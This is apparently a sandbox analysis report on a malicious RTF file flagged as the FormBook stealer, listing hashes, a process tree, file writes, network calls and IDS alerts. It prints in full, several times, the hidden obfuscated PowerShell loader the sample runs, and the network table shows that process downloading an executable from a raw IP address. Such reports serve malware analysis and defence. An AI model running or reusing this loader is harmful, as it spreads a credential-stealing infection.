File name: | 75a6e1467602c664b2e16b1eb53efef1 |
Full analysis: | https://app.any.run/tasks/813e6cee-5b08-4308-ac20-bf16ae516e47 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | July 17, 2019, 14:06:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 75A6E1467602C664B2E16B1EB53EFEF1 |
SHA1: | 66D4FF7BF1E88159D07C52DD46F164A9DA7D50B4 |
SHA256: | DF840C277459622556E8C9E06F3CCA25307A2E01ABC07436D2B11C71D3719A0A |
SSDEEP: | 1536:oZdMRFtGeCbMW+j1EysqdrnEppBS1DMO8tpsXrlaTB3HH8fKRFtGeCbMW+j1Eysw:oHMjlaxnjlaxnjlax4txS |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3632 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\75a6e1467602c664b2e16b1eb53efef1.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1216 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3464 | powershell -WindowStyle Hidden function d7e7618 { param($rf31ce) $yfe5659 = 'na3ea1';$wd92e = ''; for ($i = 0; $i -lt $rf31ce.length; $i+=2) { $vc7e9c = [convert]::ToByte($rf31ce.Substring($i, 2), 16); $wd92e += [char]($vc7e9c -bxor $yfe5659[($i / 2) % $yfe5659.length]); } return $wd92e; } $e282c84 = '1b125a0b06113d184011045c5514400c0f564e324a161554034f61100f45070c564b285f1a04410a11620b13450c02541d5a4616085f0941601c12450b0c1d210850090f5c1615580d12081012580006133618421a045e4b287e5514400c0f564e324a161554034f7d00150a636b4310035d070213060d501d12131c57075c04011e3a75020d7a08115e1c151b470a541c0f560952034c4d760b154317315c0c0f455343740015611c0e502405551c044016431833414310035d0702131615501a08504504491a04410b41780015631113111e0456520319270f473515434e115551505256041f161543070f5445020059025051480a35255f09285c1e0e411149130504410b045d5d53114941740015411c315e070f47455c114c2d5c04057d0703410413484c486e4511440c0d5a0641421a00470c02110b194700135f4e285d1131451c41525256575f49401113580006131300065952044c5a6a2a0d5f2c0c410113474d435a0b135d000d025c431f45245f1a134a350e5800150e4737581c1546040d611c0e470002454c486e4511440c0d5a0641421a00470c02110b194700135f4e035c0a0d111b58020104070d497a0b15611a1313035604565807064d64270f473515434e17510455084241460c0f454e110a04070342415c1015111b085d114153590006015718553a77090d7803115c1715194c2a56170f540252014b055d02431f45245f1a134a350e5800150e473345022c5c13047c0b0c5c17181342416000157d0f124720134301130e03005d1d041a3841421a00470c02110b194700135f4e175c0c05110b00015d025246285d1131451c414a0150085c571f2c0f453e1541450e075b040a504d580015131d02040c520606480a1e14510908524e12470415580d415a0b15111a04075602024648482c0f453e1541450b045d535107410c4e00045207004605040056075f591b4751575e02075551525a07065051035e05114c480a07071b0f54025c0351585c7800156311131f3404410a484a090e470a4142560450035503551c7a0b15611a13130e05555b5257035c410b040407495b5b520107031d0a56565257005649115707010d55035502025c54015507010856025451015954045503005d431a4c5a580849580105045d0555585c7800156311131f3404410a484a090e470a4142560450035503551c662c0f453e15414509065f0305584964270f4735154347540810085f1a41465200050d5c035e08574640465c50550b57504d0a550a540001071d06560207571d5e1907554d5e1b15131056505a021a4c1a5601155c4512090b025551530a13234a11046a33414a5355545a5c485519025f4d031d075742514b5c514c55285d1131451c41455656535d560e2800431d0952094f70020d5c062976020e51040d195d48082800431d0952094f7201114a4d18075a040749511d18520407520642521a5e04505c595006495f0b16132c0f453e15414d0a550a540001071f3a0e7a0b15075a491a4e51495e510207481d18520407520642521a5e12090b025551530b4e365607225d07045d11415e5756575c540c0004444536540c225f0c045f1a491a5e12451c085d0241455a0450515c7400175a170e5f03045d114f760b15750a0d550b136304155946245d130843010f5e000f454032430002580f0d750a0d550b131d241141020850041558010f77041550474a11393d405c02045d431a0a56565257005649115151015a5551555113475a5c5c565557541d210e46000d5c040577070d564d05060b56055459194c51055454055950065003000b55025053015855515052015d54515107015f54065050000854555052015c55525754065b55025051015d54075050015e545750500159431a4915050b02074c5a611c0e500012423d155217157800075c451208585652580f54194163170e520b12403615501c157a0b075e461507000205475a63170e520b12404b32450f13474d12085856524c5a430b1546170f115e5a4e1514530208504512450f155a0641421a135a0b06110a565652570056494011135800061309525558071a1e12451c085d02414108550206595453435d0452540f50115e12451c085d024150595655545c621a135a0b061f2b0c4311180a080e414d085f1a415a58510a075d5f560507084f7f000f561a09080c4a0c5c48480718450b41430004060c5c700a0f470b13474b355e2c184700495d5d0505034f621b034011135800061b0c4d03474d0253480a0f560403501a5349500d00434749430004060c416d4511575a50505d046a46081c5748114b41430355000d59564b2d540006470d3c18551c410015441c0f13045606085008181c'; $e282c842 = d7e7618($e282c84); Add-Type -TypeDefinition $e282c842; [y662e2]::te43c3(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2408 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2992 | powershell -WindowStyle Hidden function d7e7618 { param($rf31ce) $yfe5659 = 'na3ea1';$wd92e = ''; for ($i = 0; $i -lt $rf31ce.length; $i+=2) { $vc7e9c = [convert]::ToByte($rf31ce.Substring($i, 2), 16); $wd92e += [char]($vc7e9c -bxor $yfe5659[($i / 2) % $yfe5659.length]); } return $wd92e; } $e282c84 = '1b125a0b06113d184011045c5514400c0f564e324a161554034f61100f45070c564b285f1a04410a11620b13450c02541d5a4616085f0941601c12450b0c1d210850090f5c1615580d12081012580006133618421a045e4b287e5514400c0f564e324a161554034f7d00150a636b4310035d070213060d501d12131c57075c04011e3a75020d7a08115e1c151b470a541c0f560952034c4d760b154317315c0c0f455343740015611c0e502405551c044016431833414310035d0702131615501a08504504491a04410b41780015631113111e0456520319270f473515434e115551505256041f161543070f5445020059025051480a35255f09285c1e0e411149130504410b045d5d53114941740015411c315e070f47455c114c2d5c04057d0703410413484c486e4511440c0d5a0641421a00470c02110b194700135f4e285d1131451c41525256575f49401113580006131300065952044c5a6a2a0d5f2c0c410113474d435a0b135d000d025c431f45245f1a134a350e5800150e4737581c1546040d611c0e470002454c486e4511440c0d5a0641421a00470c02110b194700135f4e035c0a0d111b58020104070d497a0b15611a1313035604565807064d64270f473515434e17510455084241460c0f454e110a04070342415c1015111b085d114153590006015718553a77090d7803115c1715194c2a56170f540252014b055d02431f45245f1a134a350e5800150e473345022c5c13047c0b0c5c17181342416000157d0f124720134301130e03005d1d041a3841421a00470c02110b194700135f4e175c0c05110b00015d025246285d1131451c414a0150085c571f2c0f453e1541450e075b040a504d580015131d02040c520606480a1e14510908524e12470415580d415a0b15111a04075602024648482c0f453e1541450b045d535107410c4e00045207004605040056075f591b4751575e02075551525a07065051035e05114c480a07071b0f54025c0351585c7800156311131f3404410a484a090e470a4142560450035503551c7a0b15611a13130e05555b5257035c410b040407495b5b520107031d0a56565257005649115707010d55035502025c54015507010856025451015954045503005d431a4c5a580849580105045d0555585c7800156311131f3404410a484a090e470a4142560450035503551c662c0f453e15414509065f0305584964270f4735154347540810085f1a41465200050d5c035e08574640465c50550b57504d0a550a540001071d06560207571d5e1907554d5e1b15131056505a021a4c1a5601155c4512090b025551530a13234a11046a33414a5355545a5c485519025f4d031d075742514b5c514c55285d1131451c41455656535d560e2800431d0952094f70020d5c062976020e51040d195d48082800431d0952094f7201114a4d18075a040749511d18520407520642521a5e04505c595006495f0b16132c0f453e15414d0a550a540001071f3a0e7a0b15075a491a4e51495e510207481d18520407520642521a5e12090b025551530b4e365607225d07045d11415e5756575c540c0004444536540c225f0c045f1a491a5e12451c085d0241455a0450515c7400175a170e5f03045d114f760b15750a0d550b136304155946245d130843010f5e000f454032430002580f0d750a0d550b131d241141020850041558010f77041550474a11393d405c02045d431a0a56565257005649115151015a5551555113475a5c5c565557541d210e46000d5c040577070d564d05060b56055459194c51055454055950065003000b55025053015855515052015d54515107015f54065050000854555052015c55525754065b55025051015d54075050015e545750500159431a4915050b02074c5a611c0e500012423d155217157800075c451208585652580f54194163170e520b12403615501c157a0b075e461507000205475a63170e520b12404b32450f13474d12085856524c5a430b1546170f115e5a4e1514530208504512450f155a0641421a135a0b06110a565652570056494011135800061309525558071a1e12451c085d02414108550206595453435d0452540f50115e12451c085d024150595655545c621a135a0b061f2b0c4311180a080e414d085f1a415a58510a075d5f560507084f7f000f561a09080c4a0c5c48480718450b41430004060c5c700a0f470b13474b355e2c184700495d5d0505034f621b034011135800061b0c4d03474d0253480a0f560403501a5349500d00434749430004060c416d4511575a50505d046a46081c5748114b41430355000d59564b2d540006470d3c18551c410015441c0f13045606085008181c'; $e282c842 = d7e7618($e282c84); Add-Type -TypeDefinition $e282c842; [y662e2]::te43c3(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3624 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
356 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\2qefgdow.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
4060 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE83E.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE82D.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2268 | powershell -WindowStyle Hidden function d7e7618 { param($rf31ce) $yfe5659 = 'na3ea1';$wd92e = ''; for ($i = 0; $i -lt $rf31ce.length; $i+=2) { $vc7e9c = [convert]::ToByte($rf31ce.Substring($i, 2), 16); $wd92e += [char]($vc7e9c -bxor $yfe5659[($i / 2) % $yfe5659.length]); } return $wd92e; } $e282c84 = '1b125a0b06113d184011045c5514400c0f564e324a161554034f61100f45070c564b285f1a04410a11620b13450c02541d5a4616085f0941601c12450b0c1d210850090f5c1615580d12081012580006133618421a045e4b287e5514400c0f564e324a161554034f7d00150a636b4310035d070213060d501d12131c57075c04011e3a75020d7a08115e1c151b470a541c0f560952034c4d760b154317315c0c0f455343740015611c0e502405551c044016431833414310035d0702131615501a08504504491a04410b41780015631113111e0456520319270f473515434e115551505256041f161543070f5445020059025051480a35255f09285c1e0e411149130504410b045d5d53114941740015411c315e070f47455c114c2d5c04057d0703410413484c486e4511440c0d5a0641421a00470c02110b194700135f4e285d1131451c41525256575f49401113580006131300065952044c5a6a2a0d5f2c0c410113474d435a0b135d000d025c431f45245f1a134a350e5800150e4737581c1546040d611c0e470002454c486e4511440c0d5a0641421a00470c02110b194700135f4e035c0a0d111b58020104070d497a0b15611a1313035604565807064d64270f473515434e17510455084241460c0f454e110a04070342415c1015111b085d114153590006015718553a77090d7803115c1715194c2a56170f540252014b055d02431f45245f1a134a350e5800150e473345022c5c13047c0b0c5c17181342416000157d0f124720134301130e03005d1d041a3841421a00470c02110b194700135f4e175c0c05110b00015d025246285d1131451c414a0150085c571f2c0f453e1541450e075b040a504d580015131d02040c520606480a1e14510908524e12470415580d415a0b15111a04075602024648482c0f453e1541450b045d535107410c4e00045207004605040056075f591b4751575e02075551525a07065051035e05114c480a07071b0f54025c0351585c7800156311131f3404410a484a090e470a4142560450035503551c7a0b15611a13130e05555b5257035c410b040407495b5b520107031d0a56565257005649115707010d55035502025c54015507010856025451015954045503005d431a4c5a580849580105045d0555585c7800156311131f3404410a484a090e470a4142560450035503551c662c0f453e15414509065f0305584964270f4735154347540810085f1a41465200050d5c035e08574640465c50550b57504d0a550a540001071d06560207571d5e1907554d5e1b15131056505a021a4c1a5601155c4512090b025551530a13234a11046a33414a5355545a5c485519025f4d031d075742514b5c514c55285d1131451c41455656535d560e2800431d0952094f70020d5c062976020e51040d195d48082800431d0952094f7201114a4d18075a040749511d18520407520642521a5e04505c595006495f0b16132c0f453e15414d0a550a540001071f3a0e7a0b15075a491a4e51495e510207481d18520407520642521a5e12090b025551530b4e365607225d07045d11415e5756575c540c0004444536540c225f0c045f1a491a5e12451c085d0241455a0450515c7400175a170e5f03045d114f760b15750a0d550b136304155946245d130843010f5e000f454032430002580f0d750a0d550b131d241141020850041558010f77041550474a11393d405c02045d431a0a56565257005649115151015a5551555113475a5c5c565557541d210e46000d5c040577070d564d05060b56055459194c51055454055950065003000b55025053015855515052015d54515107015f54065050000854555052015c55525754065b55025051015d54075050015e545750500159431a4915050b02074c5a611c0e500012423d155217157800075c451208585652580f54194163170e520b12403615501c157a0b075e461507000205475a63170e520b12404b32450f13474d12085856524c5a430b1546170f115e5a4e1514530208504512450f155a0641421a135a0b06110a565652570056494011135800061309525558071a1e12451c085d02414108550206595453435d0452540f50115e12451c085d024150595655545c621a135a0b061f2b0c4311180a080e414d085f1a415a58510a075d5f560507084f7f000f561a09080c4a0c5c48480718450b41430004060c5c700a0f470b13474b355e2c184700495d5d0505034f621b034011135800061b0c4d03474d0253480a0f560403501a5349500d00434749430004060c416d4511575a50505d046a46081c5748114b41430355000d59564b2d540006470d3c18551c410015441c0f13045606085008181c'; $e282c842 = d7e7618($e282c84); Add-Type -TypeDefinition $e282c842; [y662e2]::te43c3(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2084 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\hdf5riec.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3632 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD050.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1216 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRDD02.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2408 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE30D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3464 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AXIPILW1LGWVGEDGMVUI.temp | — | |
MD5:— | SHA256:— | |||
3624 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE6F5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2992 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZREUU1ABEFD47QCB8ZGC.temp | — | |
MD5:— | SHA256:— | |||
356 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCE82D.tmp | — | |
MD5:— | SHA256:— | |||
356 | csc.exe | C:\Users\admin\AppData\Local\Temp\2qefgdow.pdb | — | |
MD5:— | SHA256:— | |||
4060 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESE83E.tmp | — | |
MD5:— | SHA256:— | |||
356 | csc.exe | C:\Users\admin\AppData\Local\Temp\2qefgdow.dll | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3464 | powershell.exe | GET | — | 35.225.200.121:80 | http://35.225.200.121/DD/10101304 | US | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3464 | powershell.exe | 35.225.200.121:80 | — | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.novocan.life |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3464 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3464 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3464 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|